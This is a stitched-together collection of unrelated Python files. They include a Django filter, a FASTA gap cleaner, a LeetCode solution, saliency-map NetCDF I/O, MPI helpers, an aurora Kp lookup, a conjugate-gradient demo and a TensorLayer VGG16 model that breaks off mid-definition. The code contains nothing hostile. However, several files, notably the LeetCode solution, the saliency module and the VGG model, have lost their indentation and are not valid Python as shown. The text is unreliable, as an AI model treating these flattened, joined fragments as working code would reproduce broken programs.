import django_filters
from django import forms

from .models.song import Song


class SongFilter(django_filters.FilterSet):
    artist = django_filters.CharFilter(lookup_expr='icontains', widget=forms.TextInput(attrs={'size': 20}))
    title = django_filters.CharFilter(lookup_expr='icontains', widget=forms.TextInput(attrs={'size': 20}))

    class Meta:
        model = Song
        fields = ['dance_type', 'holiday']
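# Usage sketch (illustrative, not part of the original file): a FilterSet like
# SongFilter is typically instantiated in a view with request.GET and a base
# queryset. The view function and template path below are hypothetical.
#
# from django.shortcuts import render
#
# def song_list(request):
#     song_filter = SongFilter(request.GET, queryset=Song.objects.all())
#     return render(request, 'songs/song_list.html', {'filter': song_filter})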
|
#!/usr/bin/python
'''
This script cleans up an extracted alignment so that it contains only full-length sequences.
It removes the following records from the alignment:
1. sequences that start with '-'
2. sequences that end with '-'
3. sequences in which '-' accounts for over 20% of the full length
Arguments:
1. alignment fasta file ('-' indicates gaps)
'''
from sys import argv, exit
import os
from Bio import SeqIO

if len(argv) != 2:
    exit(__doc__)

inFname = argv[1]
outFname = inFname + '_partialRemoved.fasta'
inf = open(inFname, 'r')
outf = open(outFname, 'w')
records = SeqIO.parse(inf, 'fasta')
for record in records:
    spCount = record.seq.count('-')
    fullLen = len(record.seq)
    missedPortion = float(spCount) / float(fullLen)
    # print(spCount, fullLen, missedPortion)
    if record.seq[0] == '-' or record.seq[-1] == '-' or missedPortion > 0.2:
        continue
    else:
        outf.write(">%s\n%s\n\n" % (record.description, record.seq))
inf.close()
outf.close()
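# Example invocation (illustrative; the script and file names are hypothetical):
#   python remove_partial_seqs.py my_alignment.fasta
# A record of aligned length 100 with 25 gap characters has a gap fraction of
# 0.25 > 0.2 and is dropped; a record with 10 gaps that neither starts nor ends
# with '-' (fraction 0.10) is written to my_alignment.fasta_partialRemoved.fasta.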
|
"""
T: O(NlogN + W**2*N)
S: O(N)
We operate on a sorted list of words to find the correct result.
On each iteration, we find all words which are one letter smaller
then the current one, and check if they have been seen already.
The chain length for the previous word plus one is the current
chain length. The answer is the maximum of those chains.
"""
from typing import Dict, List
class Solution:
def longestStrChain(self, words: List[str]) -> int:
dp = {} # type: Dict[str, int]
for word in sorted(set(words), key=len):
dp[word] = max(dp.get(word[:i] + word[i+1:], 0) + 1
for i in range(len(word)))
return max(dp.values())
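# Example (illustrative): for words = ["a", "b", "ba", "bca", "bda", "bdca"],
# one longest chain is "a" -> "ba" -> "bda" -> "bdca", so the answer is 4.
#
# if __name__ == "__main__":
#     print(Solution().longestStrChain(["a", "b", "ba", "bca", "bda", "bdca"]))  # 4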
|
"""Methods for computing, reading, and writing saliency maps."""
import numpy
import netCDF4
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
from gewittergefahr.deep_learning import saliency_maps as saliency_utils
EXAMPLE_DIMENSION_KEY = 'example'
CYCLONE_ID_CHAR_DIM_KEY = 'cyclone_id_char'
GRID_ROW_DIMENSION_KEY = 'grid_row'
GRID_COLUMN_DIMENSION_KEY = 'grid_column'
SATELLITE_LAG_TIME_KEY = 'satellite_lag_time'
GRIDDED_SATELLITE_CHANNEL_KEY = 'gridded_satellite_channel'
UNGRIDDED_SATELLITE_CHANNEL_KEY = 'ungridded_satellite_channel'
SHIPS_LAG_TIME_KEY = 'ships_lag_time'
SHIPS_CHANNEL_KEY = 'ships_channel'
CYCLONE_IDS_KEY = 'cyclone_id_strings'
INIT_TIMES_KEY = 'init_times_unix_sec'
GRIDDED_SATELLITE_SALIENCY_KEY = 'gridded_satellite_saliency_matrix'
UNGRIDDED_SATELLITE_SALIENCY_KEY = 'ungridded_satellite_saliency_matrix'
SHIPS_SALIENCY_KEY = 'ships_saliency_matrix'
THREE_SALIENCY_KEY = 'three_saliency_matrices'
GRIDDED_SATELLITE_INPUT_GRAD_KEY = 'gridded_satellite_input_grad_matrix'
UNGRIDDED_SATELLITE_INPUT_GRAD_KEY = 'ungridded_satellite_input_grad_matrix'
SHIPS_INPUT_GRAD_KEY = 'ships_input_grad_matrix'
THREE_INPUT_GRAD_KEY = 'three_input_grad_matrices'
MODEL_FILE_KEY = 'model_file_name'
LAYER_NAME_KEY = 'layer_name'
NEURON_INDICES_KEY = 'neuron_indices'
IDEAL_ACTIVATION_KEY = 'ideal_activation'
def check_metadata(layer_name, neuron_indices, ideal_activation):
"""Checks metadata for errors.
:param layer_name: See doc for `get_saliency_one_neuron`.
:param neuron_indices: Same.
:param ideal_activation: Same.
"""
error_checking.assert_is_string(layer_name)
error_checking.assert_is_integer_numpy_array(neuron_indices)
error_checking.assert_is_geq_numpy_array(neuron_indices, 0)
error_checking.assert_is_numpy_array(neuron_indices, num_dimensions=1)
error_checking.assert_is_not_nan(ideal_activation)
def get_saliency_one_neuron(
model_object, three_predictor_matrices, layer_name, neuron_indices,
ideal_activation):
"""Computes saliency maps with respect to activation of one neuron.
The "relevant neuron" is that whose activation will be used in the numerator
of the saliency equation. In other words, if the relevant neuron is n,
the saliency of each predictor x will be d(a_n) / dx, where a_n is the
activation of n.
:param model_object: Trained neural net (instance of `keras.models.Model` or
`keras.models.Sequential`).
:param three_predictor_matrices: length-3 list, where each element is either
None or a numpy array of predictors. Predictors must be formatted in
the same way as for training.
:param layer_name: Name of layer with relevant neuron.
:param neuron_indices: 1-D numpy array with indices of relevant neuron.
Must have length D - 1, where D = number of dimensions in layer output.
The first dimension is the batch dimension, which always has length
`None` in Keras.
:param ideal_activation: Ideal neuron activation, used to define loss
function. The loss function will be
(neuron_activation - ideal_activation)**2.
:return: three_saliency_matrices: length-3 list, where each element is
either None or a numpy array of saliency values.
three_saliency_matrices[i] will have the same shape as
three_predictor_matrices[i].
"""
check_metadata(
layer_name=layer_name, neuron_indices=neuron_indices,
ideal_activation=ideal_activation
)
error_checking.assert_is_list(three_predictor_matrices)
assert len(three_predictor_matrices) == 3
for this_predictor_matrix in three_predictor_matrices:
if this_predictor_matrix is None:
continue
error_checking.assert_is_numpy_array_without_nan(this_predictor_matrix)
these_flags = numpy.array(
[m is not None for m in three_predictor_matrices], dtype=bool
)
have_predictors_indices = numpy.where(these_flags)[0]
activation_tensor = None
for k in neuron_indices[::-1]:
if activation_tensor is None:
activation_tensor = (
model_object.get_layer(name=layer_name).output[..., k]
)
else:
activation_tensor = activation_tensor[..., k]
loss_tensor = (activation_tensor - ideal_activation) ** 2
saliency_matrices = saliency_utils.do_saliency_calculations(
model_object=model_object, loss_tensor=loss_tensor,
list_of_input_matrices=[
three_predictor_matrices[k] for k in have_predictors_indices
]
)
three_saliency_matrices = [None] * 3
for i, j in enumerate(have_predictors_indices):
three_saliency_matrices[j] = saliency_matrices[i]
return three_saliency_matrices
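# Conceptual sketch (illustrative, not part of this module): the saliency of each
# input value is the gradient of the scalar loss (activation - ideal_activation)**2
# with respect to that input. Assuming a single-input Keras model running in TF2
# eager mode, roughly the same quantity could be computed as below;
# `saliency_utils.do_saliency_calculations` above is the implementation actually
# used here.
#
# import tensorflow as tf
#
# def _saliency_sketch(model, predictor_matrix, layer_name, neuron_indices,
#                      ideal_activation):
#     submodel = tf.keras.Model(
#         inputs=model.input, outputs=model.get_layer(layer_name).output
#     )
#     input_tensor = tf.convert_to_tensor(predictor_matrix, dtype=tf.float32)
#     with tf.GradientTape() as tape:
#         tape.watch(input_tensor)
#         activation = submodel(input_tensor)
#         for k in neuron_indices[::-1]:
#             activation = activation[..., int(k)]
#         loss = (activation - ideal_activation) ** 2
#     return tape.gradient(loss, input_tensor).numpy()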
def write_file(
netcdf_file_name, three_saliency_matrices, three_input_grad_matrices,
cyclone_id_strings, init_times_unix_sec, model_file_name, layer_name,
neuron_indices, ideal_activation):
"""Writes saliency maps to NetCDF file.
E = number of examples
:param netcdf_file_name: Path to output file.
:param three_saliency_matrices: length-3 list, where each element is either
None or a numpy array of saliency values. three_saliency_matrices[i]
should have the same shape as the [i]th input tensor to the model.
Also, the first axis of each numpy array must have length E.
:param three_input_grad_matrices: Same as `three_saliency_matrices` but with
input-times-gradient values instead.
:param cyclone_id_strings: length-E list of cyclone IDs.
:param init_times_unix_sec: length-E numpy array of forecast-init times.
:param model_file_name: Path to file with neural net used to create saliency
maps (readable by `neural_net.read_model`).
:param layer_name: See doc for `get_saliency_one_neuron`.
:param neuron_indices: Same.
:param ideal_activation: Same.
"""
# Check input args.
check_metadata(
layer_name=layer_name, neuron_indices=neuron_indices,
ideal_activation=ideal_activation
)
error_checking.assert_is_list(three_saliency_matrices)
error_checking.assert_is_list(three_input_grad_matrices)
assert len(three_saliency_matrices) == 3
assert len(three_input_grad_matrices) == 3
num_examples = -1
for i in range(len(three_saliency_matrices)):
if three_saliency_matrices[i] is None:
assert three_input_grad_matrices[i] is None
continue
error_checking.assert_is_numpy_array_without_nan(
three_saliency_matrices[i]
)
error_checking.assert_is_numpy_array_without_nan(
three_input_grad_matrices[i]
)
if i == 0:
num_examples = three_saliency_matrices[i].shape[0]
expected_dim = numpy.array(
(num_examples,) + three_saliency_matrices[i].shape[1:], dtype=int
)
error_checking.assert_is_numpy_array(
three_saliency_matrices[i], exact_dimensions=expected_dim
)
error_checking.assert_is_numpy_array(
three_input_grad_matrices[i], exact_dimensions=expected_dim
)
expected_dim = numpy.array([num_examples], dtype=int)
error_checking.assert_is_string_list(cyclone_id_strings)
error_checking.assert_is_numpy_array(
numpy.array(cyclone_id_strings), exact_dimensions=expected_dim
)
error_checking.assert_is_integer_numpy_array(init_times_unix_sec)
error_checking.assert_is_numpy_array(
init_times_unix_sec, exact_dimensions=expected_dim
)
error_checking.assert_is_string(model_file_name)
# Write to NetCDF file.
file_system_utils.mkdir_recursive_if_necessary(file_name=netcdf_file_name)
dataset_object = netCDF4.Dataset(
netcdf_file_name, 'w', format='NETCDF3_64BIT_OFFSET'
)
dataset_object.setncattr(MODEL_FILE_KEY, model_file_name)
dataset_object.setncattr(LAYER_NAME_KEY, layer_name)
dataset_object.setncattr(NEURON_INDICES_KEY, neuron_indices)
dataset_object.setncattr(IDEAL_ACTIVATION_KEY, ideal_activation)
dataset_object.createDimension(EXAMPLE_DIMENSION_KEY, num_examples)
num_satellite_lag_times = None
if three_saliency_matrices[0] is not None:
num_grid_rows = three_saliency_matrices[0].shape[1]
num_grid_columns = three_saliency_matrices[0].shape[2]
num_satellite_lag_times = three_saliency_matrices[0].shape[3]
num_gridded_satellite_channels = three_saliency_matrices[0].shape[4]
dataset_object.createDimension(GRID_ROW_DIMENSION_KEY, num_grid_rows)
dataset_object.createDimension(
GRID_COLUMN_DIMENSION_KEY, num_grid_columns
)
dataset_object.createDimension(
SATELLITE_LAG_TIME_KEY, num_satellite_lag_times
)
dataset_object.createDimension(
GRIDDED_SATELLITE_CHANNEL_KEY, num_gridded_satellite_channels
)
these_dim = (
EXAMPLE_DIMENSION_KEY, GRID_ROW_DIMENSION_KEY,
GRID_COLUMN_DIMENSION_KEY, SATELLITE_LAG_TIME_KEY,
GRIDDED_SATELLITE_CHANNEL_KEY
)
dataset_object.createVariable(
GRIDDED_SATELLITE_SALIENCY_KEY,
datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[GRIDDED_SATELLITE_SALIENCY_KEY][:] = (
three_saliency_matrices[0]
)
dataset_object.createVariable(
GRIDDED_SATELLITE_INPUT_GRAD_KEY,
datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[GRIDDED_SATELLITE_INPUT_GRAD_KEY][:] = (
three_input_grad_matrices[0]
)
if three_saliency_matrices[1] is not None:
if num_satellite_lag_times is None:
num_satellite_lag_times = three_saliency_matrices[1].shape[1]
dataset_object.createDimension(
SATELLITE_LAG_TIME_KEY, num_satellite_lag_times
)
else:
assert (
num_satellite_lag_times ==
three_saliency_matrices[1].shape[1]
)
num_ungridded_satellite_channels = three_saliency_matrices[1].shape[2]
dataset_object.createDimension(
UNGRIDDED_SATELLITE_CHANNEL_KEY, num_ungridded_satellite_channels
)
these_dim = (
EXAMPLE_DIMENSION_KEY, SATELLITE_LAG_TIME_KEY,
UNGRIDDED_SATELLITE_CHANNEL_KEY
)
dataset_object.createVariable(
UNGRIDDED_SATELLITE_SALIENCY_KEY,
datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[UNGRIDDED_SATELLITE_SALIENCY_KEY][:] = (
three_saliency_matrices[1]
)
dataset_object.createVariable(
UNGRIDDED_SATELLITE_INPUT_GRAD_KEY,
datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[UNGRIDDED_SATELLITE_INPUT_GRAD_KEY][:] = (
three_input_grad_matrices[1]
)
if three_saliency_matrices[2] is not None:
num_ships_lag_times = three_saliency_matrices[2].shape[1]
num_ships_channels = three_saliency_matrices[2].shape[2]
dataset_object.createDimension(SHIPS_LAG_TIME_KEY, num_ships_lag_times)
dataset_object.createDimension(SHIPS_CHANNEL_KEY, num_ships_channels)
these_dim = (
EXAMPLE_DIMENSION_KEY, SHIPS_LAG_TIME_KEY, SHIPS_CHANNEL_KEY
)
dataset_object.createVariable(
SHIPS_SALIENCY_KEY, datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[SHIPS_SALIENCY_KEY][:] = (
three_saliency_matrices[2]
)
dataset_object.createVariable(
SHIPS_INPUT_GRAD_KEY, datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[SHIPS_INPUT_GRAD_KEY][:] = (
three_input_grad_matrices[2]
)
if num_examples == 0:
num_id_characters = 1
else:
num_id_characters = numpy.max(numpy.array([
len(id) for id in cyclone_id_strings
]))
dataset_object.createDimension(CYCLONE_ID_CHAR_DIM_KEY, num_id_characters)
this_string_format = 'S{0:d}'.format(num_id_characters)
cyclone_ids_char_array = netCDF4.stringtochar(numpy.array(
cyclone_id_strings, dtype=this_string_format
))
dataset_object.createVariable(
CYCLONE_IDS_KEY, datatype='S1',
dimensions=(EXAMPLE_DIMENSION_KEY, CYCLONE_ID_CHAR_DIM_KEY)
)
dataset_object.variables[CYCLONE_IDS_KEY][:] = numpy.array(
cyclone_ids_char_array
)
dataset_object.createVariable(
INIT_TIMES_KEY, datatype=numpy.int32, dimensions=EXAMPLE_DIMENSION_KEY
)
dataset_object.variables[INIT_TIMES_KEY][:] = init_times_unix_sec
dataset_object.close()
def read_file(netcdf_file_name):
"""Reads saliency maps from NetCDF file.
:param netcdf_file_name: Path to input file.
:return: saliency_dict: Dictionary with the following keys.
saliency_dict['three_saliency_matrices']: See doc for `write_file`.
saliency_dict['three_input_grad_matrices']: Same.
saliency_dict['cyclone_id_strings']: Same.
saliency_dict['init_times_unix_sec']: Same.
saliency_dict['model_file_name']: Same.
saliency_dict['layer_name']: Same.
saliency_dict['neuron_indices']: Same.
saliency_dict['ideal_activation']: Same.
"""
dataset_object = netCDF4.Dataset(netcdf_file_name)
three_saliency_matrices = []
three_input_grad_matrices = []
if GRIDDED_SATELLITE_SALIENCY_KEY in dataset_object.variables:
three_saliency_matrices.append(
dataset_object.variables[GRIDDED_SATELLITE_SALIENCY_KEY][:]
)
three_input_grad_matrices.append(
dataset_object.variables[GRIDDED_SATELLITE_INPUT_GRAD_KEY][:]
)
else:
three_saliency_matrices.append(None)
three_input_grad_matrices.append(None)
if UNGRIDDED_SATELLITE_SALIENCY_KEY in dataset_object.variables:
three_saliency_matrices.append(
dataset_object.variables[UNGRIDDED_SATELLITE_SALIENCY_KEY][:]
)
three_input_grad_matrices.append(
dataset_object.variables[UNGRIDDED_SATELLITE_INPUT_GRAD_KEY][:]
)
else:
three_saliency_matrices.append(None)
three_input_grad_matrices.append(None)
if SHIPS_SALIENCY_KEY in dataset_object.variables:
three_saliency_matrices.append(
dataset_object.variables[SHIPS_SALIENCY_KEY][:]
)
three_input_grad_matrices.append(
dataset_object.variables[SHIPS_INPUT_GRAD_KEY][:]
)
else:
three_saliency_matrices.append(None)
three_input_grad_matrices.append(None)
saliency_dict = {
THREE_SALIENCY_KEY: three_saliency_matrices,
THREE_INPUT_GRAD_KEY: three_input_grad_matrices,
CYCLONE_IDS_KEY: [
str(id) for id in
netCDF4.chartostring(dataset_object.variables[CYCLONE_IDS_KEY][:])
],
INIT_TIMES_KEY: dataset_object.variables[INIT_TIMES_KEY][:],
MODEL_FILE_KEY: str(getattr(dataset_object, MODEL_FILE_KEY)),
LAYER_NAME_KEY: str(getattr(dataset_object, LAYER_NAME_KEY)),
NEURON_INDICES_KEY: numpy.array(
getattr(dataset_object, NEURON_INDICES_KEY), dtype=int
),
IDEAL_ACTIVATION_KEY: getattr(dataset_object, IDEAL_ACTIVATION_KEY)
}
dataset_object.close()
return saliency_dict
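# Round-trip sketch (illustrative; file paths, cyclone IDs, and array shapes are
# hypothetical, and only the SHIPS branch is populated here):
#
# write_file(
#     netcdf_file_name='saliency_example.nc',
#     three_saliency_matrices=[None, None, ships_saliency_matrix],
#     three_input_grad_matrices=[None, None, ships_input_grad_matrix],
#     cyclone_id_strings=['2020AL01', '2020AL02'],
#     init_times_unix_sec=numpy.array([1588291200, 1588377600], dtype=int),
#     model_file_name='model.h5', layer_name='dense_3',
#     neuron_indices=numpy.array([0], dtype=int), ideal_activation=1.
# )
# saliency_dict = read_file('saliency_example.nc')
# assert saliency_dict[THREE_SALIENCY_KEY][0] is None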
|
"""Generate synthetic data for PairedDNNClassifier."""
import os
import random
import string
import numpy as np
import pandas as pd
SEED = 123
NUMBER_OF_WORDS = 300
NUMBER_OF_DIMENSIONS = 500
NUMBER_OF_PAIRS = 1000
MAXIMUM_WORD_LENGTH = 10
NUMBER_OF_TRAINING_PAIRS = int(NUMBER_OF_PAIRS*.5)
# set seed for reproducibility
random.seed(SEED)
np.random.seed(SEED)
# generate random vectors
vectors = pd.DataFrame(np.random.rand(
NUMBER_OF_WORDS, NUMBER_OF_DIMENSIONS
))
# generate random words
vectors.index = [
''.join(
random.choice(string.ascii_letters)
for i in range(random.randint(1,MAXIMUM_WORD_LENGTH))
)
for _ in range(NUMBER_OF_WORDS)
]
# write word vectors
vectors.to_csv(
os.path.join('data', 'vectors.csv')
)
# generate word pairs
pairs = pd.DataFrame(np.random.randint(
0, high=NUMBER_OF_WORDS,
size=(NUMBER_OF_PAIRS,2)
), columns=['first', 'second'])
# add label
pairs.insert(2, 'label', pairs['first'] % 2)
# replace indexes with words
pairs['first'] = vectors.index[pairs['first']]
pairs['second'] = vectors.index[pairs['second']]
# write training pairs
pairs[:NUMBER_OF_TRAINING_PAIRS].reindex().to_csv(
os.path.join('data', 'train_pairs.csv')
)
# write test pairs
pairs[NUMBER_OF_TRAINING_PAIRS:].reindex().to_csv(
os.path.join('data', 'test_pairs.csv')
)
|
import os
import sys

try:
    from mpi4py import MPI
except ImportError:
    MPI = False


def under_mpirun():
    """Return True if we're being executed under mpirun."""
    # This is a bit of a hack, but there appears to be
    # no consistent set of environment vars between MPI
    # implementations.
    for name in os.environ.keys():
        if (
            name == "OMPI_COMM_WORLD_RANK"
            or name == "MPIEXEC_HOSTNAME"
            or name.startswith("MPIR_")
            or name.startswith("MPICH_")
        ):
            return True
    return False


if under_mpirun():
    from mpi4py import MPI

    def debug(*msg):  # pragma: no cover
        newmsg = ["%d: " % MPI.COMM_WORLD.rank] + list(msg)
        for m in newmsg:
            sys.stdout.write("%s " % m)
        sys.stdout.write("\n")
        sys.stdout.flush()

else:
    MPI = None


def map_comm_heirarchical(K, K2):
    """
    Hierarchical parallelization communicator mapping. Assumes K top-level processes with K2 subprocessors each.
    Requires comm_world_size >= K + K*K2. Noninclusive: Ki is not included in the K2i execution.
    (TODO: this is not the most efficient architecture; it could be achieved with K fewer processors, but this was easier to generalize.)
    """
    N = K + K * K2
    comm_map_down = {}
    comm_map_up = {}
    color_map = [0] * K
    for i in range(K):
        comm_map_down[i] = [K + j + i * K2 for j in range(K2)]
        color_map.extend([i + 1] * K2)
        for j in comm_map_down[i]:
            comm_map_up[j] = i
    return comm_map_down, comm_map_up, color_map
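# Worked example (illustrative): map_comm_heirarchical(2, 4) assumes 2 + 2*4 = 10
# MPI ranks and returns
#   comm_map_down = {0: [2, 3, 4, 5], 1: [6, 7, 8, 9]}
#   comm_map_up   = {2: 0, 3: 0, 4: 0, 5: 0, 6: 1, 7: 1, 8: 1, 9: 1}
#   color_map     = [0, 0, 1, 1, 1, 1, 2, 2, 2, 2]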
def subprocessor_loop(comm_map_up):
    """
    Subprocessor loop, waiting to receive a function and its arguments to evaluate.
    Output of the function is returned. Loops until a stop signal is received.
    Input data format:
        data[0] = function to be evaluated
        data[1] = [list of arguments]
    If the function to be evaluated does not fit this format, then a wrapper function
    should be created and passed that handles the setup, argument assignment, etc.
    for the actual function.
    Stop signal:
        data[0] = False
    """
    # comm = impl.world_comm()
    rank = MPI.COMM_WORLD.Get_rank()
    rank_target = comm_map_up[rank]
    keep_running = True
    while keep_running:
        data = MPI.COMM_WORLD.recv(source=rank_target, tag=0)
        if data[0] is False:
            break
        else:
            func_execution = data[0]
            args = data[1]
            output = func_execution(args)
            MPI.COMM_WORLD.send(output, dest=rank_target, tag=1)


def subprocessor_stop(comm_map_down):
    """
    Send stop signal to subprocessors.
    """
    # comm = MPI.COMM_WORLD
    for rank in comm_map_down.keys():
        subranks = comm_map_down[rank]
        for subrank_i in subranks:
            MPI.COMM_WORLD.send([False], dest=subrank_i, tag=0)
    print("All MPI subranks closed.")
if __name__ == "__main__":
    from mpi4py import MPI

    (
        _,
        _,
        _,
    ) = map_comm_heirarchical(2, 4)
|
class Config():
    def __init__(self):
        self.gamma = 0.99
        self.entropy_beta = 0.001
        self.eps_clip = 0.2
        self.steps = 128
        self.batch_size = 32
        self.training_epochs = 4
        self.actors = 15
        self.learning_rate = 0.00025
|
# coding=utf-8
from datapoller.settings import THRESHOLD_FOR_KP

LON_BLOCKS = 1024
LAT_BLOCKS = 512


def lat_lon_to_cell(lat, lon):
    """
    Converts (lat, lon) to a linear cell index, based on a 1024 x 512 grid.
    Latitude ranges between -90.0 (south pole) and +90.0 (north pole); longitude is between -180.0 and +180.0.
    """
    return int((lat + 90) * LAT_BLOCKS / 180.0) * LON_BLOCKS \
        + int((lon + 180) * LON_BLOCKS / 360.0)
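# Worked example (illustrative): lat_lon_to_cell(52.0, 13.4)
#   = int((52.0 + 90) * 512 / 180.0) * 1024 + int((13.4 + 180) * 1024 / 360.0)
#   = 403 * 1024 + 550
#   = 413222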
def get_kp_level(lat):
    """
    # 0 G0 66.5° or higher  Very low
    # 1 G0 64.5°            Low
    # 2 G0 62.4°            Low
    # 3 G0 60.4°            Unsettled
    # 4 G0 58.3°            Active
    # 5 G1 56.3°            Minor storm     1700 per cycle (900 days per cycle)
    # 6 G2 54.2°            Moderate storm   600 per cycle (360 days per cycle)
    # 7 G3 52.2°            Strong storm     200 per cycle (130 days per cycle)
    # 8 G4 50.1°            Severe storm     100 per cycle (60 days per cycle)
    # 9 G5 48.1° or lower
    :param lat:
    :return:
    """
    kpTable = [66.5, 64.5, 62.4, 60.4, 58.3, 56.3, 54.2, 52.2, 50.1, 48.1]
    i = 0
    for latTable in kpTable:
        if abs(lat) >= latTable:
            return i
        i += 1
    return 10
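# Worked example (illustrative): get_kp_level(55.0) scans the table until
# abs(55.0) >= 54.2 (the seventh entry) and returns 6, i.e. aurora at 55 degrees
# latitude roughly requires Kp 6 (a G2 moderate storm).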
def is_level_interesting_for_kp(level, kp):
    return level >= THRESHOLD_FOR_KP[kp]
|
# Code from Chapter 9 of Machine Learning: An Algorithmic Perspective (2nd Edition)
# by Stephen Marsland (http://stephenmonika.net)
# You are free to use, change, or redistribute the code in any way you wish for
# non-commercial purposes, but please maintain the name of the original author.
# This code comes with no warranty of any kind.
# Stephen Marsland, 2008, 2014

# The conjugate gradients algorithm
import numpy as np


def Jacobian(x):
    # return np.array([.4*x[0], 2*x[1]])
    return np.array([x[0], 0.4 * x[1], 1.2 * x[2]])


def Hessian(x):
    # return np.array([[.2, 0], [0, 1]])
    return np.array([[1, 0, 0], [0, 0.4, 0], [0, 0, 1.2]])


def CG(x0):
    i = 0
    k = 0
    r = -Jacobian(x0)
    p = r
    betaTop = np.dot(r.transpose(), r)
    beta0 = betaTop
    iMax = 3
    epsilon = 10**(-2)
    jMax = 5

    # Restart every nDim iterations
    nRestart = np.shape(x0)[0]
    x = x0

    while i < iMax and betaTop > epsilon**2 * beta0:
        j = 0
        dp = np.dot(p.transpose(), p)
        alpha = (epsilon + 1)**2
        # Newton-Raphson iteration
        while j < jMax and alpha**2 * dp > epsilon**2:
            # Line search
            alpha = -np.dot(Jacobian(x).transpose(), p) / (np.dot(p.transpose(), np.dot(Hessian(x), p)))
            print("N-R", x, alpha, p)
            x = x + alpha * p
            j += 1
        print(x)
        # Now construct beta
        r = -Jacobian(x)
        print("r: ", r)
        betaBottom = betaTop
        betaTop = np.dot(r.transpose(), r)
        beta = betaTop / betaBottom
        print("Beta: ", beta)
        # Update the estimate
        p = r + beta * p
        print("p: ", p)
        print("----")
        k += 1

        if k == nRestart or np.dot(r.transpose(), p) <= 0:
            p = r
            k = 0
            print("Restarting")
        i += 1

    print(x)


x0 = np.array([-2, 2, -2])
CG(x0)
|
import os
from dotenv import load_dotenv

load_dotenv()


def get_env(name: str, terminal_action=True) -> str:
    """
    Return the value of an environment variable. If it is not set, prompt for it
    on the terminal (or fall back to returning the name itself when
    terminal_action is False).
    """
    if name in os.environ:
        return os.environ[name]
    try:
        if terminal_action is True:
            return input(f'Enter your {name}: ')
        else:
            return name
    except Exception as e:
        print(e)
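# Usage sketch (illustrative; the variable name is hypothetical):
#   api_key = get_env('API_KEY')                          # env/.env value, else prompt
#   api_key = get_env('API_KEY', terminal_action=False)   # never prompts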
|
import linktypes.default
import linktypes.steam
from linktypes.settings import LinktypeException

default = linktypes.default
all = {linktypes.default.name: linktypes.default,
       linktypes.steam.name: linktypes.steam}


def get_config(linktypename):
    try:
        linktype = all[linktypename]
    except KeyError:
        raise LinktypeException('Invalid linktypename "{}"'
                                .format(linktypename))
    return {'name': linktype.name,
            'linktype': linktype,
            'settings': linktype.settings()}


def deserialize(config):
    linktypename = config['name']
    try:
        linktype = all[linktypename]
    except KeyError:
        raise LinktypeException('Invalid linktypename "{}"'
                                .format(linktypename))
    try:
        settings = config['settings']
    except KeyError:
        raise LinktypeException('Missing settings')
    return {'name': linktype.name,
            'linktype': linktype,
            'settings': linktype.settings(settings)}


def serialize(config):
    settings = {key: setting.serialize()
                for key, setting in config['settings'].items()}
    return {'name': config['name'],
            'settings': settings}


def apply(config):
    for key, setting in config['settings'].items():
        setting.apply()
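# Round-trip sketch (illustrative; 'default' refers to the linktype module
# imported above, and the settings objects are assumed to expose serialize()):
#   config = get_config(default.name)     # build a fresh config for a linktype
#   stored = serialize(config)            # plain dict, safe to persist
#   restored = deserialize(stored)        # back to a config with live settings
#   apply(restored)                       # apply every setting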
|
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 6 21:36:50 2017
@author: XLP
"""
import tensorflow as tf
import tensorlayer as tl
import numpy as np
from tensorlayer.layers import list_remove_repeat
Layer = tl.layers.Layer
def image_preprocess(img,meanval):
meanval = tf.constant(meanval,tf.float32)* (1./255)
img = tf.cast(img, tf.float32)
img = tf.subtract(img, meanval)
return img
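# Note (illustrative): image_preprocess rescales meanval by 1/255 before
# subtracting, so it assumes meanval is given in 0-255 units (e.g. a per-channel
# mean loaded from a .npy file) while the input image x is already scaled to [0, 1].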
class Mergelayer(Layer):
def __init__(
self,
layer = [],
name ='merge_layer',
):
Layer.__init__(self, name=name)
self.all_layers = list(layer[0].all_layers)
self.all_params = list(layer[0].all_params)
self.all_drop = dict(layer[0].all_drop)
for i in range(1, len(layer)):
self.all_layers.extend(list(layer[i].all_layers))
self.all_params.extend(list(layer[i].all_params))
self.all_drop.update(dict(layer[i].all_drop))
self.all_layers = list_remove_repeat(self.all_layers)
self.all_params = list_remove_repeat(self.all_params)
def model_VGG16_DIMAN(x, y_,fw, im, iw, mm, mw, c, batch_size, data_shape, reuse,mean_file_name=None,is_train = True, network_scopename = "VGG16_DIMAVN" ):
if mean_file_name!=None:
meanval = np.load(mean_file_name)
x = image_preprocess(x,meanval)
gamma_init=tf.random_normal_initializer(2., 0.1)
with tf.variable_scope(network_scopename, reuse=reuse):
tl.layers.set_name_reuse(reuse)
network_input = tl.layers.InputLayer(x, name='input')
""" conv1 """
network1 = tl.layers.Conv2dLayer(network_input, shape = [3, 3, 3, 64],
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_1')
network1 = tl.layers.Conv2dLayer(network1, shape = [3, 3, 64, 64], # 64 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_2')
network1 = tl.layers.BatchNormLayer(network1, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn1')
network1 = tl.layers.PoolLayer(network1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],padding='SAME',
pool = tf.nn.max_pool, name ='pool1') #outputsize: [H/2,W/2]
""" conv2 """
network2 = tl.layers.Conv2dLayer(network1, shape = [3, 3, 64, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_1')
network2 = tl.layers.Conv2dLayer(network2, shape = [3, 3, 128, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_2')
